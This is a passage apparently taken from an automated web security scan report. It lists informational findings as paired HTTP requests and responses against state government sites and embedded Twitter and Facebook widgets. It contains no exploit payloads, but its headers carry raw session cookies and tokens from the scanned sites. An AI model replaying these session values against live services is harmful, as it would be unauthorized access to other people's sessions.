Set-Cookie: srh="1%3Aq64FAA%3D%3D"; path=/; domain=.adbrite.com; expires=Sun, 01-May-2011 15:08:52 GMT
Set-Cookie: rb2=CjQKBjY4NDMzORjljcu5CyIkNGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CjQKBjcxMTM4NBiype6REyIkYzFlMTMwMWUtM2ExZi00Y2E3LTk4NzAtZjYzNmI1ZjEwZTY2CjQKBjgwNjIwNRjAyYaZFSIkMGMyYWVkZTYtNmJiNi0xMWUwLThmZTYtMDAyNTkwMGE4ZmZlEAE; path=/; domain=.adbrite.com; expires=Fri, 29-Jul-2011 15:08:52 GMT
Set-Cookie: ut="1%3AHcxBDoMgEEDRu8yahQNKG28jitF0MhawJeh4d4nb95N%2Fwl9Df8LHl7zFKUEPSaeIgt8yM8sgiPuhQjBHFgxvE0m0YKcSeaIqbs%2BbvMQ6o8aF7Fpsy5Wn5lerNKDADcw%2Brs8brusG"; path=/; domain=.adbrite.com; expires=Tue, 27-Apr-2021 15:08:52 GMT
Set-Cookie: rb=0:684339:20838240:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:711384:20861280:c1e1301e-3a1f-4ca7-9870-f636b5f10e66:0:742697:20828160:2931142961646634775:0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0; path=/; domain=.adbrite.com; expires=Fri, 29-Jul-2011 15:08:52 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;

17.2. http://api.twitter.com/1/statuses/user_timeline/okgov.json  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://api.twitter.com
Path:   /1/statuses/user_timeline/okgov.json

Request 1

GET /1/statuses/user_timeline/okgov.json?callback=jsonp1304161991771&_=1304162000904&count=10&include_rts=true HTTP/1.1
Host: api.twitter.com
Proxy-Connection: keep-alive
Referer: http://ok.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=130314166807091166; __utmz=43838368.1303561994.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=43838368.551233229.1303561994.1303561994.1303568398.2; k=173.193.214.243.1303823909896550

Response 1

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 11:12:59 GMT
Server: hi
Status: 200 OK
X-Transaction: 1304161979-9408-31010
X-RateLimit-Limit: 150
ETag: "f58fa246b7f135099591673864c676d6"-gzip
Last-Modified: Sat, 30 Apr 2011 11:12:59 GMT
X-RateLimit-Remaining: 148
X-Runtime: 0.01693
X-Transaction-Mask: a6183ffa5f8ca943ff1b53b5644ef114bef0a1d7
Content-Type: application/json; charset=utf-8
Pragma: no-cache
X-RateLimit-Class: api
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-RateLimit-Reset: 1304165579
Set-Cookie: original_referer=Vs%2BEmu1btvu7J2ukepX8yw%3D%3D; path=/
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCC2MHKYvAToHaWQiJTA2ZmNmNTgzMGMwZmUx%250AMjdiMTRiYjFhOTBkMDYzMGM0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--357fde6f95e605cea2269a9db9ba5ff1f4d641b0; domain=.twitter.com; path=/; HttpOnly
Vary: Accept-Encoding
Connection: close
Content-Length: 24069

jsonp1304161991771([{"retweeted_status":{"text":"Congratulations @OKCThunder on the first playoff series victory for our franchise! Let's Go Thunder!","in_reply_to_status_id":null,"truncated":false,"place":null,"source":"\u003Ca href=\"http:\/\/www.hootsuite.com\" rel=\"nofollow\"\u003EHootSuite\u003C\/a\u003E","in_reply_to_user_id":null,"favorited":false,"retweet_count":0,"in_reply_to_screen_name":null,"in_reply_to_status_id_str":null,"coordinates":null,"contributors":null,"user":{"verified":false,"notifications":null,"profile_sidebar_fill_color":"DDEEF6","is_translator":false,"profile_background_tile":false,"description":"Official Twitter account of Oklahoma Governor Mary Fallin.","listed_count":39,"profile_image_url":"http:\/\/a1.twimg.com\/profile_images\/1228333442\/Governor_Mary_Fallin_-_Twitter_normal.jpg","show_all_inline_media":false,"lang":"en","geo_enabled":false,"time_zone":"Central Time (US & Canada)","friends_count":106,"profile_link_color":"0084B4","profile_sidebar_border_color":"C0DEED","followers_count":1070,"screen_name":"GovMaryFallin","location":"Oklahoma","default_profile_image":false,"default_profile":true,"statuses_count":231,"profile_use_background_image":true,"profile_background_color":"C0DEED","protected":false,"url":"http:\/\/www.ok.gov\/governor\/","following":null,"profile_background_image_url":"http:\/\/a3.twimg.com\/a\/1303425044\/images\/themes\/theme1\/bg.png","favourites_count":0,"name":"Mary Fallin","follow_request_sent":null,"created_at":"Thu Sep 23 19:06:46 +0000 2010","id":194233791,"id_str":"194233791","contributors_ena
...[SNIP]...

Request 2

GET /1/statuses/user_timeline/okgov.json?callback=jsonp1304161991771&_=1304162000904&count=10&include_rts=true HTTP/1.1
Host: api.twitter.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=130314166807091166; __utmz=43838368.1303561994.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=43838368.551233229.1303561994.1303561994.1303568398.2; k=173.193.214.243.1303823909896550

Response 2

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 11:13:05 GMT
Server: hi
Status: 200 OK
X-Transaction: 1304161985-30478-28006
X-RateLimit-Limit: 150
ETag: "f58fa246b7f135099591673864c676d6"-gzip
Last-Modified: Sat, 30 Apr 2011 11:13:05 GMT
X-RateLimit-Remaining: 125
X-Runtime: 0.01083
X-Transaction-Mask: a6183ffa5f8ca943ff1b53b5644ef114bef0a1d7
Content-Type: application/json; charset=utf-8
Pragma: no-cache
X-RateLimit-Class: api
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-RateLimit-Reset: 1304165579
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCC6lHKYvAToHaWQiJWFkMzgwNmI0OWVjODQ1%250AYzc3MTVmMGRmOGNhYWJjMmJlIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--6ed067b8a6cbaa914664dce57cb3edad5cf41228; domain=.twitter.com; path=/; HttpOnly
Vary: Accept-Encoding
Connection: close
Content-Length: 24069

jsonp1304161991771([{"retweeted_status":{"text":"Congratulations @OKCThunder on the first playoff series victory for our franchise! Let's Go Thunder!","in_reply_to_status_id":null,"truncated":false,"place":null,"source":"\u003Ca href=\"http:\/\/www.hootsuite.com\" rel=\"nofollow\"\u003EHootSuite\u003C\/a\u003E","in_reply_to_user_id":null,"favorited":false,"retweet_count":0,"in_reply_to_screen_name":null,"in_reply_to_status_id_str":null,"coordinates":null,"contributors":null,"user":{"verified":false,"notifications":null,"profile_sidebar_fill_color":"DDEEF6","is_translator":false,"profile_background_tile":false,"description":"Official Twitter account of Oklahoma Governor Mary Fallin.","listed_count":39,"profile_image_url":"http:\/\/a1.twimg.com\/profile_images\/1228333442\/Governor_Mary_Fallin_-_Twitter_normal.jpg","show_all_inline_media":false,"lang":"en","geo_enabled":false,"time_zone":"Central Time (US & Canada)","friends_count":106,"profile_link_color":"0084B4","profile_sidebar_border_color":"C0DEED","followers_count":1070,"screen_name":"GovMaryFallin","location":"Oklahoma","default_profile_image":false,"default_profile":true,"statuses_count":231,"profile_use_background_image":true,"profile_background_color":"C0DEED","protected":false,"url":"http:\/\/www.ok.gov\/governor\/","following":null,"profile_background_image_url":"http:\/\/a3.twimg.com\/a\/1303425044\/images\/themes\/theme1\/bg.png","favourites_count":0,"name":"Mary Fallin","follow_request_sent":null,"created_at":"Thu Sep 23 19:06:46 +0000 2010","id":194233791,"id_str":"194233791","contributors_enabled":false,"utc_offset":-21600,"profile_text_color":"333333"},"retwe
...[SNIP]...

17.3. http://emergency.louisiana.gov/ga.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://emergency.louisiana.gov
Path:   /ga.js

Request 1

GET /ga.js HTTP/1.1
Host: emergency.louisiana.gov
Proxy-Connection: keep-alive
Referer: http://emergency.louisiana.gov/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 404 Not Found
Date: Sat, 30 Apr 2011 00:22:58 GMT
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1183

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
<p>


The requested URL was not found on this server.


The link on the
<a href="http://emergency.louisiana.gov/">referring
page</a> seems to be wrong or outdated. Please inform the author of
<a href="http://emergency.louisiana.gov/">that page</a>
about the error.



</p>
<p>
If you think this is a server error, please contact
the <a href="mailto:%5bno%20address%20given%5d">webmaster</a>.

</p>

<h2>Error 404</h2>
<address>
<a href="/">emergency.louisiana.gov</a><br />

<span>Fri Apr 29 19:22:58 2011<br />
Apache</span>
</address>
</body>
</html>

Request 2

GET /ga.js HTTP/1.1
Host: emergency.louisiana.gov
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Date: Sat, 30 Apr 2011 00:22:59 GMT
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1036

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
<p>


The requested URL was not found on this server.


If you entered the URL manually please check your
spelling and try again.



</p>
<p>
If you think this is a server error, please contact
the <a href="mailto:%5bno%20address%20given%5d">webmaster</a>.

</p>

<h2>Error 404</h2>
<address>
<a href="/">emergency.louisiana.gov</a><br />

<span>Fri Apr 29 19:22:59 2011<br />
Apache</span>
</address>
</body>
</html>


17.4. http://twitter.com/statuses/user_timeline/IDAHOgov.json  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://twitter.com
Path:   /statuses/user_timeline/IDAHOgov.json

Request 1

GET /statuses/user_timeline/IDAHOgov.json?callback=twitterCallback2&count=1 HTTP/1.1
Host: twitter.com
Proxy-Connection: keep-alive
Referer: http://idaho.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=130340348934320043; __utmz=43838368.1303561994.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); js=1; __utma=43838368.551233229.1303561994.1303561994.1303568398.2; k=173.193.214.243.1303823909896550; _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCJSKHKYvAToHaWQiJTljOTFkZjM3NjZlNmNm%250AMjNkZTRhN2I0NGRiZTlmN2YyIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--6c8c891a8675cd914d9d5999fc92789732c3f7cb

Response 1

HTTP/1.1 400 Bad Request
Date: Sat, 30 Apr 2011 11:14:28 GMT
Server: hi
Status: 400 Bad Request
X-RateLimit-Limit: 150
X-RateLimit-Remaining: 0
X-Runtime: 0.00770
Content-Type: application/json; charset=utf-8
X-RateLimit-Class: api
Cache-Control: no-cache, max-age=300
X-RateLimit-Reset: 1304165579
Set-Cookie: original_referer=VfnNLgwEGLSuRLn%2BI4bJUDQYE4KvXy2z; path=/
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCJSKHKYvASIKZmxhc2hJQzonQWN0aW9uQ29u%250AdHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoHaWQiJTlj%250AOTFkZjM3NjZlNmNmMjNkZTRhN2I0NGRiZTlmN2Yy--0d519c459eb1d8787cd1131396dfeb7154985001; domain=.twitter.com; path=/; HttpOnly
Expires: Sat, 30 Apr 2011 11:19:28 GMT
Vary: Accept-Encoding
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Connection: close
Content-Length: 191

twitterCallback2({"request":"\/statuses\/user_timeline\/IDAHOgov.json?callback=twitterCallback2&count=1","error":"Rate limit exceeded. Clients may not make more than 150 requests per hour."})

Request 2

GET /statuses/user_timeline/IDAHOgov.json?callback=twitterCallback2&count=1 HTTP/1.1
Host: twitter.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=130340348934320043; __utmz=43838368.1303561994.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); js=1; __utma=43838368.551233229.1303561994.1303561994.1303568398.2; k=173.193.214.243.1303823909896550; _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCJSKHKYvAToHaWQiJTljOTFkZjM3NjZlNmNm%250AMjNkZTRhN2I0NGRiZTlmN2YyIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--6c8c891a8675cd914d9d5999fc92789732c3f7cb

Response 2

HTTP/1.1 400 Bad Request
Date: Sat, 30 Apr 2011 11:14:33 GMT
Server: hi
Status: 400 Bad Request
X-RateLimit-Limit: 150
X-RateLimit-Remaining: 0
X-Runtime: 0.00589
Content-Type: application/json; charset=utf-8
X-RateLimit-Class: api
Cache-Control: no-cache, max-age=300
X-RateLimit-Reset: 1304165579
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCJSKHKYvASIKZmxhc2hJQzonQWN0aW9uQ29u%250AdHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoHaWQiJTlj%250AOTFkZjM3NjZlNmNmMjNkZTRhN2I0NGRiZTlmN2Yy--0d519c459eb1d8787cd1131396dfeb7154985001; domain=.twitter.com; path=/; HttpOnly
Expires: Sat, 30 Apr 2011 11:19:33 GMT
Vary: Accept-Encoding
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Connection: close
Content-Length: 191

twitterCallback2({"request":"\/statuses\/user_timeline\/IDAHOgov.json?callback=twitterCallback2&count=1","error":"Rate limit exceeded. Clients may not make more than 150 requests per hour."})

17.5. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /plugins/like.php

Request 1

GET /plugins/like.php?href=http://www.utah.gov/pmn/sitemap/notice/67945.html&amp;layout=standard&amp;show_faces=false&amp;width=500&amp;action=like&amp;colorscheme=light&amp;height=35 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.utah.gov/pmn/sitemap/notice/67945.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response 1

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.152.54
X-Cnection: close
Date: Sat, 30 Apr 2011 11:24:16 GMT
Content-Length: 8176

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div id="connect_widget_4dbbf16056b1a0446441423" class="connect_widget" style=""><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider" style=""><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><div class="tombstone_cross"></div><span class="liketext">Like</span></a></div></div></td><td class="connect_widget_vertical_center"><span class="connect_widget_confirm_span hidden_elem"><a class="mrm connect_widget_confirm_link">Confirm</a></span></td><td class="connect_widget_vertical_center"><div class="connect_confirmation_cell connect_confirmation_cell_no_like"><div class="connect_widget_text_summary connect_text_wrapper"><span class="connect_widget_facebook_favicon"></span><span class="connect_widget_user_action connect_widget_text hidden_elem">You like this.<span class="unlike_span hidden_elem"><a class="connect_widget_unlike_link"></a></span><span class="connect_widget_admin_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_admin_option">Admin Page</a><span class="connect_widget_insights_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_insights_link">Insights</a></span></span><span class="connect_widget_error_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_error_text">Error</a></span></span><span class="connect_widget_summary connect_widget_text"><span class="connect_widget_connected_text hidden_elem">You like this</span><span class="connect_widget_not_connected_text"><a href="/campaign/landing.php?campaign_id=137675572948107&amp;partner_id=utah.gov&amp;placement=like_button&amp;extra_1=http%3A%2F%2Fwww.utah.gov%2Fpmn%2Fsitemap%2Fnotice%2F67945.html&amp;extra_2=US" target="_blank">Sign Up</a> to see what your friends like.</span><span class="unlike_span hidden_elem"><a class="connect_widget_unlike_link"></a></span><span class="connect_widget_admin_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_
...[SNIP]...

Request 2

GET /plugins/like.php?href=http://www.utah.gov/pmn/sitemap/notice/67945.html&amp;layout=standard&amp;show_faces=false&amp;width=500&amp;action=like&amp;colorscheme=light&amp;height=35 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response 2

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.149.31
X-Cnection: close
Date: Sat, 30 Apr 2011 11:24:25 GMT
Content-Length: 8038

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div id="connect_widget_4dbbf169e9afe7677574571" class="connect_widget" style=""><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider" style=""><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><div class="tombstone_cross"></div><span class="liketext">Like</span></a></div></div></td><td class="connect_widget_vertical_center"><span class="connect_widget_confirm_span hidden_elem"><a class="mrm connect_widget_confirm_link">Confirm</a></span></td><td class="connect_widget_vertical_center"><div class="connect_confirmation_cell connect_confirmation_cell_no_like"><div class="connect_widget_text_summary connect_text_wrapper"><span class="connect_widget_facebook_favicon"></span><span class="connect_widget_user_action connect_widget_text hidden_elem">You like this.<span class="unlike_span hidden_elem"><a class="connect_widget_unlike_link"></a></span><span class="connect_widget_admin_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_admin_option">Admin Page</a><span class="connect_widget_insights_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_insights_link">Insights</a></span></span><span class="connect_widget_error_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_error_text">Error</a></span></span><span class="connect_widget_summary connect_widget_text"><span class="connect_widget_connected_text hidden_elem">You like this</span><span class="connect_widget_not_connected_text"><a href="/campaign/landing.php?campaign_id=137675572948107&amp;partner_id&amp;placement=like_button&amp;extra_2=US" target="_blank">Sign Up</a> to see what your friends like.</span><span class="unlike_span hidden_elem"><a class="connect_widget_unlike_link"></a></span><span class="connect_widget_admin_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_admin_option">Admin Page</a><span class="connect_widget_insights_span hidden_e
...[SNIP]...

17.6. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://www.vermontjoblink.com
Path:   /ada/mn_forgotpass.cfm

Request 1

POST /ada/mn_forgotpass.cfm?securitysys=on&FormID=4&rand=493269 HTTP/1.1
Host: www.vermontjoblink.com
Connection: keep-alive
Referer: https://www.vermontjoblink.com/ada/mn_forgotpass.cfm
Cache-Control: max-age=0
Origin: https://www.vermontjoblink.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D
Content-Length: 283

usvuserid=&usvuserid_ADAdefault=&usvuserid_req=Please+fill+out+the+username+field.&usvuserid_verify_char%5B0%7C20%5D=The+value+you+have+supplied+for+Username+is+too+long.&submit=Continue&old_choice=2&
...[SNIP]...

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:07:33 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Pragma: no-cache
Expires: {ts '2011-04-29 17:07:33'}
Content-Type: text/html; charset=UTF-8
cache-control: no-cache, no-store, must-revalidate

<table border="0" cellpadding="0" cellspacing="0" summary=""><tr><td><script language="javascript">var submitted = 0;function validate(){if (!submitted){submitted = 1;return true;}else{
...[SNIP]...
<form action="https://www.vermontjoblink.com/ada/mn_forgotpass.cfm?securitysys=on&amp;FormID=11&amp;rand=171446" method="post" style="margin:0px;padding:0px;" name="Form0"><div class="cfform" id="cfform" title="" style="margin:0px;padding:0px;width: 547"><table border="0" cellpadding="0" cellspacing="0" width="545" class="vertical" summary=""><tr><td height="1" style="width:120px" width="120"><img src="/ada/global/images/1p.gif" alt="" height="1" width="120" /></td></tr><tr><td colspan="2"></td></tr><tr><td colspan="2" class="cfHeaderTitle">There were errors with your input.</td></tr><tr><td><br/></td></tr><tr><td colspan="2" class="cfMessage" height="1"><div class="cfInstructionText"><REQUIREDHOLDER></div></td></tr><tr class="cfElementRow"><td class="cfMessage" align="left" valign="middle" style="" colspan="2"><div class="cfInstructionText"><input type='hidden' name='library_errormessage' value="%20%3Cli%3EPlease%20fill%20out%20the%20username%20field%2E%3C%2Fli%3E%3C%2Fli%3E%20"></div></td></tr><tr><td align="left" valign="top" colspan="2" class="cfPadLeft"><input class="cfInputButton" type="submit" value="Try Again" name="goback"/> <input type="hidden" name="old_choice" value="2" class="cfTransparent"><input type="hidden" name="bltextboxextradonotuse1_error" value="" class="cfTransparent" /><input type="hidden" name="u_name_error" value="yes" class="cfTransparent" /><input type="hidden" name="cftextboxextradonotuse_error" value="" class="cfTransparent" /><input type="hidden" name="usvuserid_adadefault_error" value="" class="cfTransparent" /><input type="hidden" name="old_choice_error" value="2" class="cfTransparent" /><input type="hidden" name="usvuserid_error" value="" class="cfTransparent" /><input type="hidden" name="submit_error" value="Continue" class="cfTransparent" /><input type="hidden" name="CHOICE" value="2" class="cfTransparent" /><input type="hidden" name="formname_error" value="Form0" class="cfTransparent" /><input type="hidden" name="choice_err
...[SNIP]...

Request 2

POST /ada/mn_forgotpass.cfm?securitysys=on&FormID=4&rand=493269 HTTP/1.1
Host: www.vermontjoblink.com
Connection: keep-alive
Cache-Control: max-age=0
Origin: https://www.vermontjoblink.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D
Content-Length: 283

usvuserid=&usvuserid_ADAdefault=&usvuserid_req=Please+fill+out+the+username+field.&usvuserid_verify_char%5B0%7C20%5D=The+value+you+have+supplied+for+Username+is+too+long.&submit=Continue&old_choice=2&
...[SNIP]...

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:08:03 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
